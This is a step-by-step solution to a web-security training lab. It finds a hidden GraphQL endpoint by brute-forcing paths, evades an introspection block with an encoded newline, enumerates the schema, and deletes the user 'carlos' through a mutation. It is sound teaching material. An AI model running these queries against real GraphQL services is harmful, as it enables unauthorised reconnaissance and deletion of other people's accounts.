Lab: Finding a hidden GraphQL endpoint

The user management functions for this lab are powered by a hidden GraphQL endpoint. You won't be able to find this endpoint by simply clicking pages in the site. The endpoint also has some defenses against introspection.

To solve the lab, find the hidden endpoint and delete carlos.

Steps

• Open Burp Suite and visit the target website

• Click on any get request and send it to the intruder and repeater

• Brute force the path using the below list

/graphql
/api
/api/graphql
/graphql/api
/graphql/graphql

• In the repeater add the /api endpoint with a query

GET /graphql?query=query%7B__schema%0A%7BqueryType%7Bname%7D%7D%7D

• Switch to the GraphQL tab in repeater

• Get all the available queryType

query{__schema

{queryType{fields{name description}}}

}

• Get the available mutation type

query{__schema

{mutationType{fields{name description}}}

}

• Get the user Carlos ID

query{__schema

{queryType{fields{name description}}}

getUser(id:3)
{
	id
	username
}
}

• Delete the user carlos using the mutation type

mutation{

	deleteOrganizationUser(input:{id:3})
	{
		user {id}
	}
}

• Congrats! You have solved the lab